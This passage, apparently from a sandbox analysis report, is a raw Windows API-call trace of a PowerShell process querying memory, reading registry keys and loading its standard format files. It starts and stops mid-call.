lpAddress=0xcc020, lpBuffer=0xccee0, dwLength=0x30 | out: lpBuffer=0xccee0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.959] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.089] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.091] 
VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.092] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.118] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.118] CoTaskMemFree (pv=0x10ccc0) [0135.128] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | 
out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.138] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.139] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.140] CoTaskMemAlloc (cb=0x78) returned 0x1487c0 [0135.140] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0xcd41c, lpData=0x1487c0, lpcbData=0xcd418*=0x74 | out: lpType=0xcd41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd418*=0x74) returned 0x0 [0135.140] CoTaskMemFree (pv=0x1487c0) [0135.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0135.140] SetErrorMode (uMode=0x1) returned 0x1 
[0135.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0135.141] SetErrorMode (uMode=0x1) returned 0x1 [0135.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.142] SetErrorMode (uMode=0x1) returned 0x1 [0135.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0135.143] SetErrorMode (uMode=0x1) returned 0x1 [0135.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.144] SetErrorMode (uMode=0x1) returned 0x1 [0135.144] GetFileAttributesExW 
(in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0135.145] SetErrorMode (uMode=0x1) returned 0x1 [0135.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.145] SetErrorMode (uMode=0x1) returned 0x1 [0135.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0135.146] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] 
GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0135.148] SetErrorMode (uMode=0x1) returned 0x1 [0135.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.148] SetErrorMode (uMode=0x1) returned 
0x1 [0135.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 
[0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.152] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.153] CoTaskMemFree (pv=0x10ccc0) [0135.176] CoTaskMemAlloc (cb=0x104) returned 
0x10ccc0 [0135.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.177] CoTaskMemFree (pv=0x10ccc0) [0135.177] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.177] CoTaskMemFree (pv=0x10ccc0) [0135.178] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.178] CoTaskMemFree (pv=0x10ccc0) [0135.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.179] SetErrorMode (uMode=0x1) returned 0x1 [0135.179] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.180] GetFileType (hFile=0x308) returned 0x1 [0135.180] SetErrorMode (uMode=0x1) returned 0x1 [0135.180] GetFileType (hFile=0x308) returned 0x1 [0135.180] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x9e2, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a8d82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a8d82*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.188] CloseHandle (hObject=0x308) returned 1 [0135.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.188] SetErrorMode (uMode=0x1) returned 0x1 [0135.188] GetFileAttributesExW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0135.188] SetErrorMode (uMode=0x1) returned 0x1 [0135.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.189] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.189] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a6d0 [0135.189] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a6d0, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.189] CoTaskMemFree (pv=0x1b80a6d0) [0135.189] RegCloseKey (hKey=0x308) returned 0x0 [0135.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.237] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3f624de6, Data2=0xe23a, Data3=0x4d5d, Data4=([0]=0xb8, [1]=0x9b, [2]=0x71, [3]=0x7f, [4]=0x27, [5]=0x19, [6]=0x28, [7]=0x63))) returned 0x0 [0135.256] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6d9129e7, Data2=0xbf34, Data3=0x46a8, Data4=([0]=0x93, [1]=0x64, [2]=0x3a, [3]=0xbe, [4]=0xdd, [5]=0xa3, [6]=0x5c, [7]=0xf5))) returned 0x0 [0135.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.259] SetErrorMode (uMode=0x1) returned 0x1 [0135.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.259] GetFileType (hFile=0x308) returned 0x1 [0135.259] SetErrorMode (uMode=0x1) returned 0x1 [0135.259] GetFileType (hFile=0x308) returned 0x1 [0135.259] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0xfb2, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d3aba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d3aba*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.264] CloseHandle (hObject=0x308) returned 1 [0135.264] GetFullPathNameW (in: 